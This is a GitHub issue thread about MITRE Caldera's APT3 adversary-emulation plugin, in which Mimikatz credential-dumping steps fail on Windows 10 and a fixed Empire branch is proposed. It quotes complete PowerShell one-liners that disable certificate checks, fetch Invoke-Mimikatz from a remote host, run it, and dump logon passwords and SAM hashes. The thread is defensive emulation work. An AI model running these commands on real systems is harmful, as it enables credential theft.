[Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update

[Cyb3rWard0g]

Good evening team,

This issue goes along with:

• [Plugin - Phase 9 - 3.A.1] Bypass User Account Control (T1088) #1
• [Plugin - Phase 10 - 3.B.1] Process Discovery (T1057), 3.C.1 - Process Injection (T1055) #2

because they are from the same setup and operation execution (APT3 - Full)

When I got to steps 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) , Mimikatz failed to run.

Script step 5.A.1 : https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more...

Script step 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055): https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"};hashdump;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more..

I was doing some reading and also remembered seeing something similar when playing with Empire (master branch). I remember switching to DEV branch and it worked properly with WIn10. Remember I am using The Shire Mordor Environment and my workstations are Win10 and Servers are Win 2019. They are all configured to the setup standards from the evals.

I also saw this issue in the Caldera repo which confirmed what I was thinking when I saw those initial error messages: mitre/caldera#38

I confirmed that Mimikatz in Empire Master branch does not have that fix applied. However, DEV branch does have it. I believe the following needs to be updated then:

• evals_caldera/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml

  Line 16 in 1b3f5ff

  $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");

• evals_caldera/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml

  Line 16 in 1b3f5ff

  $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");

I can submit a PR too, but I wanted to first check with you guys. I will give it a try with those two fixes soon.

Thank you in advance!

[Cyb3rWard0g]

This was updated with the latest Mimikatz release: https://raw.githubusercontent.com/hunters-forge/Blacksmith/master/aws/mordor/cfn-files/scripts/Invoke-Mimikatz.ps1

UPDATED $PEBytes64 strings - 2.2.0-20190813 Release - Updated 10/20/2019

[jondricek]

Admin note: closing all remaining issues and pull requests prior to archiving the repository